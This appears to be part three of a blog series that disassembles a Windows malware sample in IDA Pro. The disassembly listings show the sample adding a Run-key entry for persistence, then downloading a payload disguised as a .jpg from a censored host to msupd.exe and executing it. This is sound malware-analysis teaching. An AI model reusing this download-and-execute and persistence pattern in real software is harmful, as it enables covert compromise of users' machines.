Examining a piece of malware for strings (sequences of printable characters) can reveal a few clues about what the malware does, or what it is capable of doing. Part two predicted the behaviour of some functions, based on which strings they referenced. Part three will start to disassemble these functions to see how closely the predicted behaviour matches their actual behaviour.
Loading the malware sample in to the free edition of IDA Pro again, I disassembled the functions identified in part two. I shall only show the parts of the code that reference the strings found in part one, otherwise this blog article would be even longer.
_WinMain@16()
Let’s start with WinMain, as that will be where the main program flow starts (after the runtime initialisation code, etc.). We have seen that the _WinMain@16() function references the following strings:
PHIME2008 Software\Microsoft\Windows\CurrentVersion\Run /SYNC
_WinMain@16() starts off by calling WSAStartup() to initialise the Winsock (Windows Sockets) subsystem (remember when you had to install third party software called ‘Trumpet Winsock’!?), and then gets down to business with the following:
.text:0040101B push 104h ; nSize .text:00401020 push offset ExistingFileName ; lpFilename .text:00401025 push 0 ; hModule .text:00401027 call ds:GetModuleFileNameA
It is calling the Win32 API function GetModuleFileName() with the hModule parameter (the first one) equal to NULL. This will return the path (directory/folder and file name) of the executable file that started the current process.
The malware then uses a couple of the ‘repeat’ instruction prefixes (‘rep’ and ‘repne’) with the ‘scas’ (scan string) and ‘movs’ (move string) instructions, to append the string ‘ /SYNC’ to the file name returned by the GetModuleFileNameA() call. This is starting to look like a command line.
.text:00401090 lea eax, [esp+5A4h+hKey] .text:00401094 mov ecx, ebx .text:00401096 push eax ; phkResult .text:00401097 push 0 ; lpSecurityAttributes .text:00401099 push 0F003Fh ; samDesired .text:0040109E push 0 ; dwOptions .text:004010A0 push 0 ; lpClass .text:004010A2 and ecx, 3 .text:004010A5 push 0 ; Reserved .text:004010A7 push offset SubKey ; "Software\\Microsoft\\Windows\\CurrentVersion\Run" .text:004010AC rep movsb .text:004010AE push HKEY_LOCAL_MACHINE ; hKey .text:004010B3 call ds:RegCreateKeyExA
Here, the RegCreateKeyEx() Win32 API function is called to create the ‘HKLM\Software\Microsoft\Windows\CurrentVersion\Run’ registry key. This registry key specifies a list of processes/applications/commands to start/run when Windows starts, and is one of the methods that malware uses to achieve persistence. That is, it enables the malware to survive a reboot.
Without persistence, the malware process(es), just like normal application processes, would be killed when Windows shuts down, and wouldn’t start up again until started by a user. Not the kind of thing that you want if you are trying to run and remain undetected by the user.
.text:004010B9 lea ecx, [esp+5A0h+Data] .text:004010BD push ecx ; lpString .text:004010BE call ds:lstrlenA .text:004010C4 inc eax .text:004010C5 lea edx, [esp+5A0h+Data] .text:004010C9 push eax ; cbData .text:004010CA mov eax, [esp+5A4h+hKey] .text:004010CE push edx ; lpData .text:004010CF push REG_SZ ; dwType .text:004010D1 push 0 ; Reserved .text:004010D3 push offset ValueName ; "PHIME2008" .text:004010D8 push eax ; hKey .text:004010D9 call ds:RegSetValueExA
The ‘HKLM\Software\Microsoft\CurrentVersion\Run’ registry key contains a registry value (each with a name and associated data) for each application/process/command that is to be started when Windows start up.
This code fragment is calling lstrlen() to determine the length of the string in the variable that IDA Pro has labelled ‘Data’. The malware is calculating the length of the string because the length needs to be passed to the RegSetValueEx() function.
Here the malware goes on to call RegSetValueEx() to create a value called ‘PHIME2008’, and the data that it is assigning to this value is in the Data variable. This variable is where the process’ executable file name was copied to, along with the ‘ /SYNC’ string. In other words, this will cause Windows to load the malware on start up, and pass it the ‘/SYNC’ command line argument. This argument is probably used to inform the malware that it is running as part of system start up, rather than running to infect the system.
WinMain() then calls the sub_4013b0() function, and uses its return value as the only parameter to sub_401c40(). It then gets a tad over excited and creates 100 threads, at 13ms intervals, with each thread running sub_401870(), before sitting in an infinite Sleep(), calling WSACleanup() to free Winsock resources, and exiting.
sub_401eb0()
Since sub_401eb0() is the first malware function called by WinMain(), let’s look at it next. To recap, it references the following strings:
URLDownloadToFileA DeleteUrlCacheEntry http://[censored].jp/updata/ACCl3.jpg urlmon.dll wininet.dll \msupd.exe
sub_401eb0() starts by initialising a number of variables to 0, before running the following code fragment:
.text:00401F09 lea ecx, [esp+268h+CommandLine] .text:00401F0D mov [esp+268h+hObject], ebx .text:00401F11 push ecx ; lpBuffer .text:00401F12 stosb .text:00401F13 call ds:GetSystemDirectoryA
The second parameter to GetSystemDirectory(), ‘uSize’, was pushed just before this code segment, in amongst some of the variable initialisation code. uSize was set to 0x400 (1024 in decimal) bytes. So here we have a buffer of 1024 bytes (which IDA Pro has called ‘CommandLine’), which should get populated with the path of the system directory.
.text:00401F19 lea edx, [esp+264h+CommandLine] .text:00401F1D push offset aMsupd_exe ; "\\msupd.exe" .text:00401F22 push edx ; lpString1 .text:00401F23 call ds:lstrcatA
This fragment calls lstrcat() (string concatenate) to append the string ‘\msupd.exe’ to the path of the system directory in the CommandLine variable.
.text:00401F29 lea eax, [esp+264h+CommandLine] .text:00401F2D push ebx ; iReadWrite .text:00401F2E push eax ; lpPathName .text:00401F2F call ds:_lopen .text:00401F35 cmp eax, HFILE_ERROR .text:00401F38 jz short loc_401F4E .text:00401F3A push eax ; hFile .text:00401F3B call ds:_lclose
The malware is now checking to see if it can open the file <systemdir>\msupd.exe (the value in the CommandLine variable). The value of the ebx register at this point, is 0 (it hasn’t been modified since being zeroed using ‘xor ebx,ebx’).
An Internet search for documentation on the _lopen() call reveals that the ‘iReadWrite’ parameter can be one of OF_READ, OF_READWRITE, or OF_WRITE, and that it can also be combined (using a bitwise ‘or’) with one of five OF_SHARE_* constants.
This is where it is handy to have some Win32 include files. These include files should be included with a Win32 SDK (Software Development Kit), which in my case is the GNU C compiler (as a cross compiler for MinGW32) on Linux.
I am looking for a constant starting with ‘OF_’, that is defined as being ‘0’ (as ebx is 0 when it is used as the second parameter to _lopen()), so I issue the following grep (short for ‘get regular expression’) command:
grep " OF_.*0$" *.h
The regular expression (search string, basically) has a space at the start, as I am looking for lines with “#define OF_” (and can’t be bothered including the ‘#define ‘ in the regular expression. Also, if I did, I would be limiting the number of spaces to one unless I also included an asterisk).
The ‘.*’ matches zero or more occurrences of any character, the ‘0’ matches a ‘0’ (funnily enough), and the ‘$’ matches the end of a line (doesn’t a ‘$’ always remind you of the end of a line!?).
The leading space is to stop the regular expression from matching constants that have the string ‘OF_’ in the middle of them (like ‘IMAGE_SIZEOF_SYMBOL’, for instance). Anyway, enough about grep.
$ grep " OF_.*0$" *.h winbase.h:#define OF_READ 0 winbase.h:#define OF_SHARE_COMPAT 0
That grep command shows that the include file ‘winbase.h’ defines both OF_READ and OF_SHARE_COMPAT as being ‘0’. That tells us that the second parameter to the _lopen() call is equivalent to ‘OF_READ | OF_SHARE_COMPAT’.
If the _lopen() call does not return the HFILE_ERROR error code, then the function closes the file and returns 0. It looks like the malware is using the _lopen() call to determine whether or not the <systemdir>\msupd.exe file exists.
If the _lopen() call fails with HFILE_ERROR, then the function continues, and here we see another one of the strings that we identified:
.text:00401F4E lea ecx, [esp+264h+String1] .text:00401F55 push offset aHttpURL_jpUp ; "http://[censored].jp/updata/ACCl3.jpg" .text:00401F5A push ecx ; lpString1 .text:00401F5B call ds:lstrcpyA
A HTTP URL is copied (using lstrcpy()) in to a variable that IDA Pro has called ‘String1’.
.text:00401F61 mov ebp, ds:LoadLibraryA .text:00401F67 push offset LibFileName ; "wininet.dll" .text:00401F6C call ebp ; LoadLibraryA .text:00401F6E mov esi, eax .text:00401F70 cmp esi, ebx .text:00401F72 jnz short loc_401F84
LoadLibrary() is used to load ‘wininet.dll’. The return value (which Win32 API documentation tells us is a handle to the loaded module) is checked and if it is NULL (that is, the LoadLibrary() call failed), sub_401eb0() returns -2 (0xfffffffe). Negative values are often returned from functions in order to indicate an error condition.
.text:00401F84 push offset ProcName ; “DeleteUrlCacheEntry”
.text:00401F89 push esi ; hModule
.text:00401F8A call ds:GetProcAddress
.text:00401F90 cmp eax, ebx
.text:00401F92 jnz short loc_401FAB
This code fragment calls GetProcAddress() using the module handle returned from the previous LoadLibrary() call, and another string ‘DeleteUrlCacheEntry’, to find the address of the DeleteUrlCacheEntry() Win32 function. The return value (the function address) is checked and, if NULL (indicating that the GetProcAddress() call failed), sub_401eb0() calls FreeLibrary() to unload the ‘wininet.dll’ library, and then returns -2.
.text:00401FAB lea edx, [esp+264h+String1]
.text:00401FB2 push edx
.text:00401FB3 call eax
Here sub_401eb0() calls DeleteUrlCacheEntry() (as its address is still in the eax register after returning from GetProcAddress()), with the ‘String1’ variable as its parameter. In other words, it will delete any locally cached copy of the URL.
It then calls LoadLibrary() to load ‘urlmon.dll’, and GetProcAddress() to get the address of ‘URLDownloadToFile()’ (which is a pretty self-explanatory function name). Again, it unloads the library and returns -2 if either the LoadLibrary() or the GetProcAddress() call fails.
.text:00401FFE push ebx ; lpfnCallback .text:00401FFF lea ecx, [esp+268h+CommandLine] .text:00402003 push ebx ; dwReserved .text:00402004 lea edx, [esp+26Ch+String1] .text:0040200B push ecx ; szFilename .text:0040200C push edx ; szUrl .text:0040200D push ebx ; NULL .text:0040200E call eax ; URLDownloadToFile()
Bingo. The ‘http://[censored].jp/updata/ACCl3.jpg’ URL is downloaded to <systemdir>\msupd.exe. I don’t know about you, but I’m starting to suspect that ‘ACCl3.jpg’ may not actually be the picture of cute fluffy kittens that I was hoping for. The sub_401eb0() function then calls FreeLibrary() to unload urlmon.dll, and if the URLDownloadToFile() call failed, it returns -1 (0xffffffff).
.text:00402027 lea eax, [esp+264h+hObject] .text:0040202B lea ecx, [esp+264h+StartupInfo] .text:0040202F push eax ; lpProcessInformation .text:00402030 push ecx ; lpStartupInfo .text:00402031 push ebx ; lpCurrentDirectory .text:00402032 push ebx ; lpEnvironment .text:00402033 push ebx ; dwCreationFlags .text:00402034 push ebx ; bInheritHandles .text:00402035 push ebx ; lpThreadAttributes .text:00402036 lea edx, [esp+280h+CommandLine] .text:0040203D push ebx ; lpProcessAttributes .text:0040203E push edx ; lpCommandLine .text:0040203F push ebx ; lpApplicationName .text:00402040 mov [esp+28Ch+StartupInfo.cb], 44h .text:00402048 call ds:CreateProcessA .text:0040204E test eax, eax
Here we go, this is where we can really suspect that the ‘ACCl3.jpg’ file may actually be an executable file rather than an image file (the file name extension of ‘.jpg’ suggests that the file is a type of image). The ebx register is still 0 at this point, so most of those parameters are 0 or NULL.
The address of the ‘hObject’ variable is passed in as the lpProcessInformation parameter. The CreateProcess() function will populate a ProcessInformation data structure starting at this address, with information about the newly created process.
The lpCommandLine parameter is the address of our ‘CommandLine’ variable, and the lpStartupInfo parameter contains the address of a StartupInfo structure which was initialised to 0 at the start of sub_401eb0(). The StartupInfo.cb element, which indicates the size of the structure, is initialised to 0x44 (68 bytes).
If the CreateProcess() function fails, it will return 0, in which case sub_401eb0() returns 0. Otherwise, it closes handles, and then returns 1.
I shall keep you in suspense at this point, as this article is getting quite long, and the second function called from WinMain(), sub_401c40(), has quite a bit to it, so I shall save that for part four.
Where are we up to? We have identified that WinMain() does indeed install a registry entry so that it will get started when Windows starts up, and we have confirmed that sub_401eb0() downloads http://[censored].jp/updata/ACCl3.jpg to msupd.exe (in the Windows system directory).
Does sub_401c40() actually leak information (as the updata in the URL, along with the HTTP query string, suggest) and if so, what information does it leak; and what do the three functions called by sub_401c40() actually do (I can tell you now, it’s not about to help you manage your financial accounts)? Tune in to part four where I shall attempt to answer those questions, without creating a ridiculously long blog entry.